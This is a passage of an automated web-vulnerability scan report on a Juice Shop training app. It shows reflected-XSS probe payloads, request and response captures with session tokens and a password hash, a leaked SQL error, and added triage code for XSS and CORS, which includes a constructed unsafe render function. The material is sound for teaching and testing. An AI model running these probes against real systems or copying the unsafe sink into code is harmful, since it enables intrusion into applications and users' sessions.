    Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    DNT: 1
    Connection: close

    {"UserId":7,"comment":"wewewenpftf<a>yv6ra","rating":0}

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Content-Type: application/json; charset=utf-8
    Content-Length: 173
    ETag: W/"ad-a8ne4rM2nqdrRTWwz/URgw"
    Date: Sun, 15 Jan 2017 21:07:07 GMT
    Connection: close

    {"status":"success","data":{"UserId":7,"comment":"wewewenpftf<a>yv6ra</a>","rating":0,"id":22,"updatedAt":"2017-01-15T21:07:07.000Z","createdAt":"2017-01-15T21:07:07.000Z"}}
    14.10. http://192.168.61.143:3000/api/Feedbacks/ [name of an arbitrarily supplied URL parameter]

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /api/Feedbacks/

    Issue detail

    The name of an arbitrarily supplied URL parameter is copied into the HTML document as plain text between tags. The payload xbdkn<script>alert(1)</script>zqy3j was submitted in the name of an arbitrarily supplied URL parameter. This input was echoed unmodified in the application's response.

    This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

    The response does not state that the content type is HTML. The issue is only directly exploitable if a browser can be made to interpret the response as HTML. No modern browser will interpret the response as HTML. However, the issue might be indirectly exploitable if a client-side script processes the response and embeds it into an HTML context.

    Request 1

    GET /api/Feedbacks/?xbdkn<script>alert(1)<%2fscript>zqy3j=1 HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    Referer: http://192.168.61.143:3000/
    Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    DNT: 1
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Content-Type: application/json; charset=utf-8
    Content-Length: 157
    ETag: W/"9d-JzTgBYGufnFnqT1YMGvdgQ"
    Date: Sun, 15 Jan 2017 21:09:09 GMT
    Connection: close

    {"status":"error","message":{"errno":1,"code":"SQLITE_ERROR","sql":"SELECT * FROM `Feedbacks` WHERE `Feedbacks`.`xbdkn<script>alert(1)</script>zqy3j`='1';"}}
    14.11. http://192.168.61.143:3000/api/Feedbacks/ [rating JSON parameter]

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /api/Feedbacks/

    Issue detail

    The value of the rating JSON parameter is copied into the HTML document as plain text between tags. The payload zrydj<img src=a onerror=alert(1)>wla6t was submitted in the rating JSON parameter. This input was echoed unmodified in the application's response.

    This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The proof-of-concept attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

    The request uses a Content-type header which it is not possible to generate using a standard HTML form. Burp attempted to replace this header with a standard value, to facilitate cross-domain delivery of an exploit, but this does not appear to be possible.

    The response does not state that the content type is HTML. The issue is only directly exploitable if a browser can be made to interpret the response as HTML. No modern browser will interpret the response as HTML. However, the issue might be indirectly exploitable if a client-side script processes the response and embeds it into an HTML context.

    Request 1

    POST /api/Feedbacks/ HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/json;charset=utf-8
    Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    Referer: http://192.168.61.143:3000/
    Content-Length: 42
    Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    DNT: 1
    Connection: close

    {"UserId":7,"comment":"wewewe","rating":0zrydj<img src=a onerror=alert(1)>wla6t}

    Response 1

    HTTP/1.1 400 Bad Request
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Content-Type: application/json; charset=utf-8
    Date: Sun, 15 Jan 2017 21:07:51 GMT
    Connection: close
    Content-Length: 934

    {
    "error": {
    "message": "Unexpected token z",
    "stack": "SyntaxError: Unexpected token z\n at Object.parse (native)\n at parse (/root/juice-shop/node_modules/body-parser/lib/types/json.
    ...[SNIP]...
    )\n at _combinedTickCallback (internal/process/next_tick.js:74:11)\n at process._tickCallback (internal/process/next_tick.js:98:9)",
    "body": "{\"UserId\":7,\"comment\":\"wewewe\",\"rating\":0zrydj<img src=a onerror=alert(1)>wla6t}",
    "status": 400,
    "statusCode": 400
    }
    }
    14.12. http://192.168.61.143:3000/api/Feedbacks/ [request body]

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /api/Feedbacks/

    Issue detail

    The value of the request body is copied into the HTML document as plain text between tags. The payload ivc1p<script>alert(1)</script>fzw7g was submitted in the request body. This input was echoed unmodified in the application's response.

    This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

    The request uses a Content-type header which it is not possible to generate using a standard HTML form. Burp attempted to replace this header with a standard value, to facilitate cross-domain delivery of an exploit, but this does not appear to be possible.

    The response does not state that the content type is HTML. The issue is only directly exploitable if a browser can be made to interpret the response as HTML. No modern browser will interpret the response as HTML. However, the issue might be indirectly exploitable if a client-side script processes the response and embeds it into an HTML context.

    Request 1

    POST /api/Feedbacks/ HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/json;charset=utf-8
    Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    Referer: http://192.168.61.143:3000/
    Content-Length: 42
    Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    DNT: 1
    Connection: close

    {"UserId":7,"comment":"wewewe","rating":0}ivc1p<script>alert(1)</script>fzw7g

    Response 1

    HTTP/1.1 400 Bad Request
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Content-Type: application/json; charset=utf-8
    Date: Sun, 15 Jan 2017 21:06:47 GMT
    Connection: close
    Content-Length: 931

    {
    "error": {
    "message": "Unexpected token i",
    "stack": "SyntaxError: Unexpected token i\n at Object.parse (native)\n at parse (/root/juice-shop/node_modules/body-parser/lib/types/json.
    ...[SNIP]...
    \n at _combinedTickCallback (internal/process/next_tick.js:74:11)\n at process._tickCallback (internal/process/next_tick.js:98:9)",
    "body": "{\"UserId\":7,\"comment\":\"wewewe\",\"rating\":0}ivc1p<script>alert(1)</script>fzw7g",
    "status": 400,
    "statusCode": 400
    }
    }
    14.13. http://192.168.61.143:3000/api/Users/ [email JSON parameter]

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /api/Users/

    Issue detail

    The value of the email JSON parameter is copied unmodified into the JSON response body. The payload de508<script>alert(1)</script>jgyda was submitted in the email JSON parameter and was echoed back in the email field of the newly created user record.

    This proof-of-concept shows that arbitrary markup survives the round trip through the application. It does not by itself show that the markup executes anywhere.

    The request uses a Content-type header (application/json) which it is not possible to generate using a standard HTML form. Burp attempted to replace this header with a standard value, to facilitate cross-domain delivery of an exploit, but this does not appear to be possible.

    The response is declared as application/json and carries X-Content-Type-Options: nosniff, so no modern browser will interpret it as HTML and the issue is not directly exploitable. It might be indirectly exploitable if client-side script takes the email field, from this response or from a later read of the stored record, and inserts it into an HTML context without escaping. Note also that the 200 response returns a hash of the new account's password (the 32-hex-character password field) alongside the email; the same value appears in the data claim of the HS256 JWT carried in the Authorization header and token cookie of the other requests in this report.

    Request 1

    POST /api/Users/ HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/json;charset=utf-8
    Referer: http://192.168.61.143:3000/
    Content-Length: 108
    Cookie: io=_u0wPeQi82ftthU7AAAB
    DNT: 1
    Connection: close

    {"email":"mike_landeck@hotmail.comde508<script>alert(1)<\/script>jgyda","password":"juice-shop-password","passwordRepeat":"juice-shop-password"}

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Content-Type: application/json; charset=utf-8
    Content-Length: 231
    ETag: W/"e7-TT6ZSYYFfJgV8aeROhh9ig"
    Date: Sun, 15 Jan 2017 21:10:28 GMT
    Connection: close

    {"status":"success","data":{"email":"mike_landeck@hotmail.comde508<script>alert(1)</script>jgyda","password":"a992b1b403cba28afb428e7f5a35c516","id":15,"updatedAt":"2017-01-15T21:10:28.000Z","createdAt":"2017-01-15T21:10:28.000Z"}}
    14.14. http://192.168.61.143:3000/api/Users/ [request body]

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /api/Users/

    Issue detail

    The value of the request body is copied unmodified into the response. The payload ta2gz<script>alert(1)</script>a7ofk was appended to the JSON request body and was echoed back inside the error object of the 400 response.

    This proof-of-concept shows that arbitrary markup is reflected by the application. It does not by itself show that the markup executes anywhere.

    The request uses a Content-type header (application/json) which it is not possible to generate using a standard HTML form. Burp attempted to replace this header with a standard value, to facilitate cross-domain delivery of an exploit, but this does not appear to be possible.

    The response is declared as application/json and carries X-Content-Type-Options: nosniff, so no modern browser will interpret it as HTML and the issue is not directly exploitable. It might be indirectly exploitable if client-side script embeds the message or body field of the error object into an HTML context without escaping. The 400 itself is body-parser's JSON parse failure: the error object echoes the full raw request body (including the submitted password) and a stack trace with server filesystem paths under /root/juice-shop/, which is an information disclosure independent of the reflection.

    Request 1

    POST /api/Users/ HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/json;charset=utf-8
    Referer: http://192.168.61.143:3000/
    Content-Length: 108
    Cookie: io=_u0wPeQi82ftthU7AAAB
    DNT: 1
    Connection: close

    {"email":"mike_landeck@hotmail.com","password":"juice-shop-password","passwordRepeat":"juice-shop-password"}ta2gz<script>alert(1)</script>a7ofk

    Response 1

    HTTP/1.1 400 Bad Request
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Content-Type: application/json; charset=utf-8
    Date: Sun, 15 Jan 2017 21:10:24 GMT
    Connection: close
    Content-Length: 1001

    {
    "error": {
    "message": "Unexpected token t",
    "stack": "SyntaxError: Unexpected token t\n at Object.parse (native)\n at parse (/root/juice-shop/node_modules/body-parser/lib/types/json.
    ...[SNIP]...
    at process._tickCallback (internal/process/next_tick.js:98:9)",
    "body": "{\"email\":\"mike_landeck@hotmail.com\",\"password\":\"juice-shop-password\",\"passwordRepeat\":\"juice-shop-password\"}ta2gz<script>alert(1)</script>a7ofk",
    "status": 400,
    "statusCode": 400
    }
    }
    14.15. http://192.168.61.143:3000/rest/user/login [request body]

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /rest/user/login

    Issue detail

    The value of the request body is copied unmodified into the response. The payload kc8b5<script>alert(1)</script>rzq3i was appended to the JSON request body and was echoed back inside the error object of the 400 response.

    This proof-of-concept shows that arbitrary markup is reflected by the application. It does not by itself show that the markup executes anywhere.

    The request uses a Content-type header (application/json) which it is not possible to generate using a standard HTML form. Burp attempted to replace this header with a standard value, to facilitate cross-domain delivery of an exploit, but this does not appear to be possible.

    The response is declared as application/json and carries X-Content-Type-Options: nosniff, so no modern browser will interpret it as HTML and the issue is not directly exploitable. It might be indirectly exploitable if client-side script embeds the message or body field of the error object into an HTML context without escaping. As with the previous issue, the 400 is body-parser's JSON parse failure and its error object echoes the full raw request body, here the login email and password, together with a stack trace containing server filesystem paths under /root/juice-shop/.

    Request 1

    POST /rest/user/login HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/json;charset=utf-8
    Referer: http://192.168.61.143:3000/
    Content-Length: 69
    Cookie: io=_u0wPeQi82ftthU7AAAB
    DNT: 1
    Connection: close

    {"email":"mike_landeck@hotmail.com","password":"juice-shop-password"}kc8b5<script>alert(1)</script>rzq3i

    Response 1

    HTTP/1.1 400 Bad Request
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Content-Type: application/json; charset=utf-8
    Date: Sun, 15 Jan 2017 21:13:36 GMT
    Connection: close
    Content-Length: 958

    {
    "error": {
    "message": "Unexpected token k",
    "stack": "SyntaxError: Unexpected token k\n at Object.parse (native)\n at parse (/root/juice-shop/node_modules/body-parser/lib/types/json.
    ...[SNIP]...
    ack (internal/process/next_tick.js:74:11)\n at process._tickCallback (internal/process/next_tick.js:98:9)",
    "body": "{\"email\":\"mike_landeck@hotmail.com\",\"password\":\"juice-shop-password\"}kc8b5<script>alert(1)</script>rzq3i",
    "status": 400,
    "statusCode": 400
    }
    }
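
    The three reflection issues above (14.13 to 14.15) share one triage question: can the JSON response be rendered as HTML, and if not, does the consuming client put the reflected field into markup? The following is an added example written for this report, not code from Burp Suite or from OWASP Juice Shop. The response head and the reflected email value are copied from the 14.13 response; the two render functions are constructed to show the unsafe sink Burp describes beside an escaped one, and are not taken from the Juice Shop front end.

```javascript
// Added example for this report, not code from Burp Suite or OWASP Juice Shop.
// Two checks a reviewer applies to a reflected payload in a JSON API response:
// (1) can a browser be made to render the response itself as HTML, and
// (2) does the client that consumes the JSON put the reflected field into
// markup without escaping. The response head below is copied from the
// /api/Users/ response in this report; the render functions are constructed.

// Parse a raw HTTP response head (status line plus headers) into an object
// with lower-cased header names. The body is not needed for this check.
function parseResponseHead(raw) {
  const lines = raw.split(/\r?\n/).filter((l) => l.length > 0);
  const status = Number(lines[0].split(' ')[1]);
  const headers = {};
  for (const line of lines.slice(1)) {
    const idx = line.indexOf(':');
    if (idx === -1) continue;
    headers[line.slice(0, idx).trim().toLowerCase()] = line.slice(idx + 1).trim();
  }
  return { status, headers };
}

// A response is only directly renderable as HTML when it is declared as an
// HTML type, or when the type is missing and nosniff does not forbid guessing.
function directlyRenderableAsHtml(headers) {
  const contentType = (headers['content-type'] || '').toLowerCase();
  const nosniff =
    (headers['x-content-type-options'] || '').toLowerCase() === 'nosniff';
  if (contentType.startsWith('text/html') ||
      contentType.startsWith('application/xhtml+xml')) {
    return true;
  }
  return contentType === '' && !nosniff;
}

// Minimal HTML escaping for text and double-quoted attribute contexts.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// The indirect sink Burp describes: a client that concatenates an API field
// into markup (for example before assigning it to innerHTML). Constructed.
function renderGreetingUnsafe(user) {
  return `<p>Welcome back, ${user.email}</p>`;
}

// Same rendering with the field escaped, so the payload stays inert text.
function renderGreetingSafe(user) {
  return `<p>Welcome back, ${escapeHtml(user.email)}</p>`;
}

// Detects Burp's marker tag in produced markup. Whether it would execute
// depends on the sink: innerHTML does not run inserted script elements, but
// it does fire event handlers on tags such as img, so the marker standing
// in the output is the finding, not a proof of execution.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Copied from the report: the 200 response head to POST /api/Users/.
const REPORT_RESPONSE_HEAD = [
  'HTTP/1.1 200 OK',
  'X-Powered-By: Express',
  'Access-Control-Allow-Origin: *',
  'X-Content-Type-Options: nosniff',
  'X-Frame-Options: SAMEORIGIN',
  'Content-Type: application/json; charset=utf-8',
  'Content-Length: 231',
].join('\r\n');

// The reflected field from the same response (email with the Burp payload).
const REPORT_USER = {
  email: 'mike_landeck@hotmail.comde508<script>alert(1)</script>jgyda',
  id: 15,
};
```

    Run against the report's own headers, directlyRenderableAsHtml returns false because of the declared JSON type and nosniff, which is why Burp rates these three issues as Information; the unsafe render function is where the same payload would become a real cross-site scripting bug.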
    15. Cross-origin resource sharing

    There are 105 instances of this issue:

    Issue background

    An HTML5 cross-origin resource sharing (CORS) policy controls whether and how content running on other origins can perform two-way interaction with the origin that publishes the policy. The policy is fine-grained and can apply access controls per request based on the URL and other features of the request.

    If another origin is allowed by the policy, then that origin can potentially attack users of the application. If a user is logged in to the application, and visits an origin allowed by the policy, then any malicious content running on that origin can potentially retrieve content from the application, and sometimes carry out actions within the security context of the logged-in user. How much is exposed depends on the exact headers: a wildcard Access-Control-Allow-Origin lets any origin read responses to requests sent without credentials, but browsers block reading a credentialed response under it, whereas an allowed origin combined with Access-Control-Allow-Credentials: true exposes the logged-in user's data to that origin.

    Even if an allowed origin is not overtly malicious in itself, security vulnerabilities within that origin could potentially be leveraged by an attacker to exploit the trust relationship and attack the application that allows access. CORS policies on pages containing sensitive information should be reviewed to determine whether it is appropriate for the application to trust both the intentions and security posture of any origins granted access.
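
    The following is an added example written for this report, not code from Burp Suite or from OWASP Juice Shop. It turns the background above into a triage routine: given the arbitrary Origin a probe request carried and the response headers that came back, it says which policy the server applied and whether a page on another origin could read the unauthenticated or the credentialed response. The wildcard header set is copied from the /api/BasketItems/ response in this report; the reflecting header set and the probe origin https://attacker.example are constructed for contrast and were not observed on Juice Shop.

```javascript
// Added example for this report, not code from Burp Suite or OWASP Juice Shop.
// Triage a CORS response the way a reviewer does: given the arbitrary Origin
// a probe request carried and the response headers that came back, decide
// what a page on another origin can read. The header sets at the bottom are
// either copied from responses in this report or constructed for contrast.

function normalizeHeaders(rawHeaders) {
  const out = {};
  for (const [name, value] of Object.entries(rawHeaders)) {
    out[name.toLowerCase()] = String(value).trim();
  }
  return out;
}

function classifyCors(sentOrigin, rawHeaders) {
  const h = normalizeHeaders(rawHeaders);
  const acao = h['access-control-allow-origin'];
  const allowCredentials =
    (h['access-control-allow-credentials'] || '').toLowerCase() === 'true';
  const variesOnOrigin = (h['vary'] || '')
    .toLowerCase()
    .split(',')
    .map((v) => v.trim())
    .includes('origin');

  const result = {
    policy: 'none', // none | wildcard | null | reflected | allowlisted
    anonymousReadable: false, // any page can read the unauthenticated response
    credentialedReadable: false, // any page can read it with the victim's cookies
    findings: [],
  };
  if (acao === undefined) return result;

  if (acao === '*') {
    // Browsers refuse to expose a credentialed response under a wildcard, so
    // only the anonymous view leaks; Allow-Credentials:true is ignored here.
    result.policy = 'wildcard';
    result.anonymousReadable = true;
    result.findings.push('wildcard origin: any site can read unauthenticated responses');
    if (allowCredentials) {
      result.findings.push('Allow-Credentials:true with * is ignored by browsers');
    }
    return result;
  }

  if (acao === 'null') {
    // Sandboxed iframes (and some redirects) send Origin: null, so trusting
    // "null" is as permissive as reflecting an arbitrary origin.
    result.policy = 'null';
    result.findings.push('null origin trusted: reachable from a sandboxed iframe');
  } else if (acao === sentOrigin) {
    // The probe origin was arbitrary, so equality means the server reflected
    // it (or allowlists everything), which is the dangerous configuration.
    result.policy = 'reflected';
    result.findings.push(`probe origin ${sentOrigin} was accepted`);
  } else {
    // A fixed origin that is not ours: nothing is readable from the probe origin.
    result.policy = 'allowlisted';
    result.findings.push(`fixed origin ${acao}; probe origin was not accepted`);
    return result;
  }

  result.anonymousReadable = true;
  result.credentialedReadable = allowCredentials;
  if (allowCredentials) {
    result.findings.push('credentialed reads allowed: logged-in user data exposed');
  }
  if (!variesOnOrigin) {
    // Only an origin-dependent allow header makes a cached copy dangerous: a
    // shared cache may replay one origin's allow header to every other origin.
    result.findings.push('origin-dependent ACAO without Vary: Origin: cache poisoning risk');
  }
  return result;
}

// Copied from the /api/BasketItems/ response in this report.
const REPORT_HEADERS = {
  'X-Powered-By': 'Express',
  'Access-Control-Allow-Origin': '*',
  'X-Content-Type-Options': 'nosniff',
  'X-Frame-Options': 'SAMEORIGIN',
  'Content-Type': 'application/json; charset=utf-8',
};

// Constructed for contrast, not observed on Juice Shop: the origin is
// reflected, credentials are allowed and there is no Vary header.
const PROBE_ORIGIN = 'https://attacker.example';
const CONSTRUCTED_REFLECTING_HEADERS = {
  'Access-Control-Allow-Origin': PROBE_ORIGIN,
  'Access-Control-Allow-Credentials': 'true',
  'Content-Type': 'application/json',
};
```

    For the report's own headers the routine returns policy "wildcard" with no credentialed read and no Vary finding, which matches the Information severity Burp assigns to the 105 instances below; the constructed reflecting headers produce the reflected, credentialed, cache-poisonable combination that deserves a High rating.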

    15.1. http://192.168.61.143:3000/

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request: the response carries Access-Control-Allow-Origin: * and no Access-Control-Allow-Credentials header. Browsers refuse to expose a response to a credentialed cross-origin request when the allowed origin is the wildcard, so what a page on any other origin can read is the unauthenticated view of this resource.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk, because a page on any origin can read the response through the browser of a user inside the trusted network.

    Burp flags the absent Vary: Origin header as a cache poisoning risk. That concern applies when the allowed origin is reflected from the request; here the header is a fixed * that does not depend on the request's Origin, so a cached copy of this response is no more permissive than a fresh one.

    Request 1

    GET / HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Cookie: io=Ji9iYLhA0a_FezL5AAAA
    DNT: 1
    Connection: close
    Upgrade-Insecure-Requests: 1
    If-Modified-Since: Wed, 28 Dec 2016 00:59:55 GMT
    If-None-Match: W/"2639-15942f0cef8"
    Cache-Control: max-age=0

    Response 1

    HTTP/1.1 304 Not Modified
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
    ETag: W/"2639-15942f0cef8"
    Date: Sun, 15 Jan 2017 21:00:23 GMT
    Connection: close

    15.2. http://192.168.61.143:3000/api/BasketItems/

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /api/BasketItems/

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request: the response carries Access-Control-Allow-Origin: * and no Access-Control-Allow-Credentials header. Browsers refuse to expose a response to a credentialed cross-origin request when the allowed origin is the wildcard, so what a page on any other origin can read is the unauthenticated view of this resource.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk, because a page on any origin can read the response through the browser of a user inside the trusted network.

    Burp flags the absent Vary: Origin header as a cache poisoning risk. That concern applies when the allowed origin is reflected from the request; here the header is a fixed * that does not depend on the request's Origin, so a cached copy of this response is no more permissive than a fresh one.

    Request 1

    POST /api/BasketItems/ HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/json;charset=utf-8
